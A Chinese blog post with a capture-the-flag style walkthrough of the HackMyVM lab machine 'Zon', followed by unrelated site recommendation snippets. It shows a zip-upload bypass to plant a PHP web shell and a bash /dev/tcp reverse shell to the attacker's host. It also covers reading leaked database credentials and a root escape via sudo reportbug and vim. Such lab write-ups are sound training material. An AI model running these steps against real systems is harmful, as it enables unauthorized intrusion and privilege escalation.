Zon - hackmyvm

最新推荐文章于 2024-08-15 16:19:01 发布
最新推荐文章于 2024-08-15 16:19:01 发布
阅读量456 收藏 10
点赞数 4
分类专栏: hackmyvm靶场合集 文章标签: 安全 服务器 网络 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/141114459
版权

简介

靶机名称:Zon

难度:中等

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Zon

本地环境

虚拟机:vitual box

靶场IP(Zon):192.168.130.72

windows_IP:192.168.130.158

kali_IP:192.168.130.156

扫描

nmap起手

nmap -sT -p0- 192.168.130.72 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo  nmap -sT -sV -sC -O -p$ports 192.168.130.72 -oA nmapscan/detail

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 09:41 EDT
Nmap scan report for zon.lan (192.168.130.72)
Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: zon
MAC Address: 08:00:27:D0:8D:E8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

经典22,80组合

HTTP

路径扫描

gobuster dir -u  http://192.168.130.72/ -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -b 400-404 -t 10 -x php,zip,bak,jpg,png,mp4,mkv,txt,html,md,git,7z,rar,db,log,docx,xlsx

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.130.72/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   400,401,402,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,md,rar,docx,png,html,db,log,jpg,mp4,git,7z,php,bak,mkv,xlsx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.130.72/images/]
/index.php            (Status: 200) [Size: 29170]
/contact.php          (Status: 200) [Size: 11753]
/about.php            (Status: 200) [Size: 10538]
/blog.php             (Status: 200) [Size: 12490]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.130.72/uploads/]
/upload.php           (Status: 500) [Size: 0]
/service.php          (Status: 200) [Size: 12239]
/report.php           (Status: 200) [Size: 13]
/icon                 (Status: 301) [Size: 315] [--> http://192.168.130.72/icon/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.130.72/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.130.72/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.130.72/fonts/]
/choose.php           (Status: 200) [Size: 1908]
/testimonial.php      (Status: 200) [Size: 17014]

choose.php路径可以进行文件上传

image-20240811224730263

我这里随便塞了个空txt进zip包,上传后进入/uploads路径,发现文件已经被解压出来了。

image-20240811230903665

尝试直接塞个php进去,结果说不是JPEG的文件会被删。

image-20240811231053491

虽然表示得很清楚,检测到非JPG文件。但是我第一次上传的空txt文件也不是JPG,但还是成功上传了,这是不是什么bug?

于是这次我给压缩包塞了两个文件,一个空txt一个phpshell——这下成功了。

image-20240811231725020

小马运行正常。

image-20240811231821736

提权

数据库

在html目录下找到登录mysql的凭据。admin:udgrJbFc6Av#U3

www-data@zon:…/www/html# cat hashDB.sh
#!/bin/bash

# script that checks the database's integrity every minute

dump=/dev/shm/dump.sql
log=/var/log/db_integrity_check.log
true > "${log}"

/usr/bin/mysqldump -u admin -pudgrJbFc6Av#U3 admin credentials > "${dump}"
/usr/bin/sed -i '$d' "${dump}"

hash="29d8e6b76aab0254f7fe439a6a5d2fba64270dde087e6dfab57fa57f6749858a"
check_hash=$(sha256sum "${dump}" | awk '{print $1}')

if [[ "${hash}" != "${check_hash}" ]] ; then
  /usr/bin/wall "Alert ! Database hacked !"
  /usr/bin/du -sh /var/lib/mysql >> "${log}"
  /usr/bin/vmstat 1 3 >> "${log}"
else
  /usr/bin/sync && /usr/bin/echo 3 > /proc/sys/vm/drop_caches
  /usr/bin/echo "$(date) : Integrity check completed for ${dump}" >> "${log}"
fi

这里就不得不反弹并修补个完整的shell了。

监听:

rlwrap -cAr nc -lvvp 40001

反弹shell:

bash -c "bash -i >& /dev/tcp/192.168.130.156/40001 0>&1"

修补:

/usr/bin/script -qc /bin/bash /dev/null

image-20240811232447692

MariaDB [admin]> select * from credentials;
select * from credentials;
+----------+-------------------------+
| username | password                |
+----------+-------------------------+
| Freddie  | LDVK@dYiEa2I1lnjrEeoMif |
+----------+-------------------------+
1 row in set (0.000 sec)


www-data@zon:/home$ su freddie
su freddie
Password: LDVK@dYiEa2I1lnjrEeoMif
╭─freddie@zon /home
╰─$ id
id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),100(users)
╭─freddie@zon /home
╰─$ cd;ls
cd;ls
user.txt

切换用户成功,拿到user.txt

sudo

sudo -l起手,查看权限

╭─freddie@zon ~
╰─$ sudo -l
Matching Defaults entries for freddie on zon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User freddie may run the following commands on zon:
    (ALL : ALL) NOPASSWD: /usr/bin/reportbug

这是个python脚本,内容还挺长的,就不贴了,总之是个debian官方的工具,可以用来报告错误。

image-20240811235403544

报告模式随便选一个就行。重点是最后会让我们编辑邮件的内容,然后挑选编辑器。

这里使用vim,进入后输入:!/bin/sh

image-20240811235423824

拿到root的shell。获得root.txt

image-20240811235445603

结束

古明地核
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Anti-zon-crx插件
04-01
语言:English 在Amazon上随机化链接,以进行随机产品探索。 此扩展将Amazon上的所有链接随机化,以将用户发送到与预期完全不同的地方。 以一种完全独特的方式浏览该网站,并确定随机机会是否会导致您偶然发现您最不...
[HackMyVM]靶场 Zon
qq_34942239的博客
03-18 305
经过测试,修改文件头,%00隔断都没用,最后一句话马用shell.jpg .php(注意有一个空格)的名字成功上传。上传要求是zip里面包一个jpeg文件,然后再uploads里面就能看到这个文件。进去找到了Freddie的密码,测试发现用户名首字母小写。经过一一测试发现choose.php可以文件上传。bash就能拿到root权限。发现一个可疑文件hashDB.sh。reportbug可以提权。总结:文件上传空格绕过。泄露了数据库账号密码。运行之后我就乱按一通。
ima-zon-simple-client:首先看全包电子商务网站。 享受我的网站
03-29
ima-zon-simple-client 单一页面的电子商务网站,用户可以在其中浏览新产品,然后可以使用信用卡购买商品 | 特色 一个完整的电子商务网站,您可以在其中查看自己喜欢的产品及其详细信息。 (虚拟产品) Google登录...
D--R&Ve--zon-2020ve--zon数据泄露调查报告(英文)-2020.8-67页精品报告2020.pdf
04-24
D--R&Ve--zon-2020ve--zon数据泄露调查报告(英文)-2020.8-67页精品报告2020.pdf
Ve--zon-2020年数据泄露调查报告(英文)-2020.8-119页精品报告2020.pdf
04-24
《Ve--zon-2020年数据泄露调查报告》详细介绍了2020年全球数据泄露事件的统计、分析和趋势。该报告通过严谨的数据分析,从不同维度对数据泄露事件进行分类和总结,并提供了一系列针对数据泄露的预防措施和建议。 ...
ZON「Anti-zon」-crx插件
03-11
随机化亚马逊上的链接,允许随机产品探索。 此扩展将Amazon上的所有链接随机化,以将用户发送到与预期完全不同的地方。 以一种完全独特的方式浏览该网站,并确定随机机会是否会导致您偶然发现您最不希望看到的有用...
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 113
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 468
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 531
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Scout Suite:开源云安全审计工具
网络研究观
08-12 279
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 711
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 419
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
超网和无类间路由是什么?
m0_73609283的博客
08-14 743
CIDR允许更灵活的IP地址分配,减少了地址空间的浪费。例如,一个企业可能需要一个完整的B类地址空间(65536个地址),但又超过了C类地址空间(256个地址)在这种情况下,CIDR可以明确分配一个合理的地址范围(如1024个地址),从而避免地址的浪费。无类间路由(CIDR)是一种新的IP地址分配方法,取代了传统的基于类的分配方法。通过合并连续的子网,超网可以减少路由入侵的数量,从而提高网络的效率。总之,超网和无类间路由技术提高了IP地址的利用效率,还简化了路由表管理,支持网络的灵活扩展。
Vulnhub靶机 lin security(渗透测试详解)
2301_78721909的博客
08-14 290
Vulnhub靶机 lin security(渗透测试详解)
网络安全(黑客)自学
白帽子凯哥聊黑客
08-12 267
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
常见编码形式特征汇总(1)
2301_81504456的博客
08-13 606
常见编码说明
水库大坝安全预警系统的作用
最新发布
m0_69813885的博客
08-15 119
汛情就是命令,防汛就是责任”,为了防治和减轻洪涝带来的危害,需要一种以预警为先导的临灾位移监测系统--水库大坝安全预警系统,对可能会出现的灾害进行实时远程监控,尽可能做到隐患早发现、早决策、早治理,减少损失。水库大坝安全预警系统可以通过实时的监测水平位移、垂直位移,可以帮助管理人员及时掌握大坝的运行状态和安全风险,以便管理人员根据监测情况。水库大坝安全预警系统是保障水利建设的重要方法之一,通过实时的监测和预警,管理人员可以及时发现所存在的安全隐患,制定相应的管理和维护策略。对大坝进行实时安全监测。
【投融界-注册安全分析报告】
08-15 504
投融界作为互联网投资的平台,拥有一定的技术资源, 采用的是通俗的滑动验证产品+ IP限制的策略, IP限制措施存在一定的误拦截,比如搞活动时,由于用户是同一个热点,就可能被误拦截,滑动验证码行为验证产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
SSH服务的高级安全配置:使用chroot环境
liuxin33445566的博客
08-12 497
chroot(change root)是一个UNIX系统调用,它允许改变进程的根目录。当SSH服务运行在chroot环境中时,它将无法访问服务器上的其他文件和目录,从而限制了潜在的损害。
.zon { width: 100%; height: 700px; position: relative; z-index: 1; } .tou { position: absolute; left: 0; top: 0; width: 100%; height: 700px; z-index: -1; } .tou div { position: absolute; left: 0; top: 0; width: 100%; height: 700px; opacity: 0; background-size: cover; animation: lunbo 32s linear infinite; }想设置八张图片为背景图向右循环播放,我不想把八张图片合并成为一张大图
06-10
这段代码似乎是想要实现一个轮播图的效果,但是没有提供图片的链接,无法确定具体实现方法。不过,如果您想要将八张图片设置为背景图轮播,可以将每张图片分别设置为不同的div的背景图,并使用CSS3的动画效果实现轮播。下面是一个简单的实现示例: HTML代码: ```html <div class="zon"> <div class="tou"> <div style="background-image: url(图片1链接);"></div> <div style="background-image: url(图片2链接);"></div> <div style="background-image: url(图片3链接);"></div> <div style="background-image: url(图片4链接);"></div> <div style="background-image: url(图片5链接);"></div> <div style="background-image: url(图片6链接);"></div> <div style="background-image: url(图片7链接);"></div> <div style="background-image: url(图片8链接);"></div> </div> </div> ``` CSS代码: ```css .zon { width: 100%; height: 700px; position: relative; z-index: 1; } .tou { position: absolute; left: 0; top: 0; width: 100%; height: 700px; z-index: -1; } .tou div { position: absolute; left: 0; top: 0; width: 100%; height: 700px; opacity: 0; background-size: cover; animation: lunbo 32s linear infinite; } .tou div:nth-child(1) { animation-delay: 0s; } .tou div:nth-child(2) { animation-delay: 4s; } .tou div:nth-child(3) { animation-delay: 8s; } .tou div:nth-child(4) { animation-delay: 12s; } .tou div:nth-child(5) { animation-delay: 16s; } .tou div:nth-child(6) { animation-delay: 20s; } .tou div:nth-child(7) { animation-delay: 24s; } .tou div:nth-child(8) { animation-delay: 28s; } @keyframes lunbo { from { opacity: 0; transform: translateX(0%); } to { opacity: 1; transform: translateX(-100%); } } ``` 在CSS中,我们设置了八个div,每个div都设置了不同的背景图,并且使用了CSS3的动画效果实现了向右循环播放。其中,通过设置animation-delay属性来控制每个div的播放时间,使得八张图片可以依次播放。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值